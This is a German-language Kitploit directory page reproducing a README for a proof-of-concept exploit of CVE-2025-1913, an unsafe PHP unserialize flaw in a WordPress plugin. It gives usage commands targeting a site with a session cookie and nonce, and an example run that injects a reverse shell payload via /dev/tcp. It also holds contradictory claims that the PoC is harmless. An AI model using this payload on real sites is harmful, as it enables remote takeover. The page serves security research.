Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1913-PoC — Ein PoC, der CVE-2025-1913 demonstriert und zeigt, wie die unsichere unserialize-Behandlung des Plugins zu Verhalten mit hoher Auswirkung in kontrollierten Umgebungen führen kann. Enthält eine schädliche Payload nur für autorisierte Tests. Ausschließlich in isolierten Laboren und für defensive Forschung verwenden. | Kitploit
Tools/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
21vor 8 MonatenNoch nicht geprüft

Über

Ein PoC, der CVE-2025-1913 demonstriert und zeigt, wie die unsichere unserialize-Behandlung des Plugins zu Verhalten mit hoher Auswirkung in kontrollierten Umgebungen führen kann. Enthält eine schädliche Payload nur für autorisierte Tests. Ausschließlich in isolierten Laboren und für defensive Forschung verwenden.

Teilen

CVE-2025-1913 -- Proof of Concept (PoC)

Dieses Repository enthält einen rein bildungsorientierten Proof of Concept (PoC) für CVE-2025-1913, erstellt von Suhaib518 🇸🇦. Dieser PoC zeigt, wie speziell präparierte serialisierte PHP-Eingaben anfällige Logik in betroffenen WordPress-Komponenten auslösen können. Der PoC ist sicher und enthält keine schädlichen Payloads.

⚠️ Haftungsausschluss: Dieser PoC dient ausschließlich zu Lern-, Forschungs- und defensiven Sicherheitstests. Verwenden Sie ihn NICHT auf Servern, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


📌 Übersicht

Die Schwachstelle besteht aufgrund unsicherer Handhabung von PHP-serialisierten Daten in bestimmten WordPress-Plugin-Workflows. Dieser PoC zeigt, wie ein Angreifer maßgeschneiderte serialisierte Strukturen bereitstellen könnte, die unbeabsichtigtes internes Verhalten verursachen.

Dieses Repository enthält ein Python-Skript, das:

  • Benutzerdefinierte serialisierte PHP-Objekte erstellt
  • Diese für WordPress-AJAX-basierte Export-Endpunkte kodiert
  • Eine kontrollierte Anfrage sendet, um das Problem sicher zu demonstrieren

📂 Dateien in diesem Repository

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Das PoC-Skript, erstellt von Suhaib518 KSA
└── README.md                    # Dokumentation

🚀 Verwendung

1. Anforderungen installieren

Das Skript verwendet nur integrierte Python-Module mit Ausnahme von requests:

root@kitploit:~
pip install requests

2. Das interaktive Exploit-Skript ausführen

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Sie werden gefragt:

  • Wie viele Eigenschaften (properties) enthalten sein sollen
  • Den Namen/Wert für jede Eigenschaft

Das Skript serialisiert diese dann, erstellt eine WordPress-Anfrage und sendet sie ab.


✔️ Beispielbefehl (Ablauf einer erfolgreichen Ausnutzung)

Im Folgenden ein Beispielbefehl, der die Verwendung mit Beispielwerten demonstriert (diese sind nicht bösartig, sie zeigen nur den Vorgang):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Beispielantworten auf die interaktiven Fragen:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

Das Skript gibt dann Folgendes aus:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ Maßnahmen zur Schadensbegrenzung (Überblick)

  • Vermeiden Sie die Verwendung von unserialize() bei nicht vertrauenswürdigen Eingaben
  • Validieren Sie alle Formularparameter und AJAX-Anfragen
  • Halten Sie Plugins auf dem neuesten Stand
  • Verwenden Sie moderne Datenformate wie JSON anstelle von PHP-Serialisierung

📜 Lizenz

MIT Lizenz.


🙌 Autor

Erstellt von Suhaib518 🇸🇦.

Tool herunterladen